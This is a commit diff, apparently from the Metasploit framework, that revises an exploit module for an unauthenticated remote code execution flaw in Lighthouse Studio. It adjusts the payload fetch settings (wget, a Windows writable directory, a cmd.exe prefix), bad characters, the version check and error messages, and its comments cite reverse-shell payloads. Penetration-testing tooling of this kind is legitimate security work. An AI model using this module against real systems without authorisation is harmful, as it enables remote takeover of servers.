Code Review Edits from @sjanusz-r7

vognik · vognik · commit 82eadede83f9 · 2025-07-25T05:17:48.000+04:00
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
@@ -44,7 +44,11 @@ def initialize(info = {})
             {
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                # On Ubuntu 18.04.06 LTS curl is not installed by default
+                'FETCH_COMMAND' => 'WGET'
+              }
               # Tested with cmd/unix/reverse_bash
               # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
             }
@@ -56,12 +60,19 @@ def initialize(info = {})
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
               'DefaultOptions' => {
-                'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\'
+                # Environment variables like %TEMP% don't resolve
+                'FETCH_WRITABLE_DIR' => '\\Windows\\Tasks\\'
+              },
+              'Payload' => {
+                'Prepend' => 'cmd.exe /q /c '
               }
               # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
             }
           ],
         ],
+        'Payload' => {
+          'BadChars' => '\\'
+        },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-07-16',
         'Notes' => {
@@ -93,7 +104,7 @@ def check
       'method' => 'GET',
       'vars_get' => vars
     )
-    return CheckCode::Unknown('No response from target') unless res
+    return CheckCode::Unknown('No response from target') unless res&.code == 200
 
     if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/
       version_match = Regexp.last_match(1).to_s
@@ -116,8 +127,7 @@ def check
   def exploit
     print_status('Uploading malicious payload...')
 
-    cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F')
-    cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd
+    cmd = Rex::Text.uri_encode(payload.encoded)
 
     query = [
       'hid_javascript=1',
@@ -136,8 +146,8 @@ def exploit
 
     if res
       html = res.get_html_document
-      if html&.text&.include?('Cannot find default studyname')
-        fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
+      if html&.text&.include?('Cannot find the study name')
+        fail_with(Failure::BadConfig, 'The STUDYNAME value was not found on the server')
       end
     end
   end
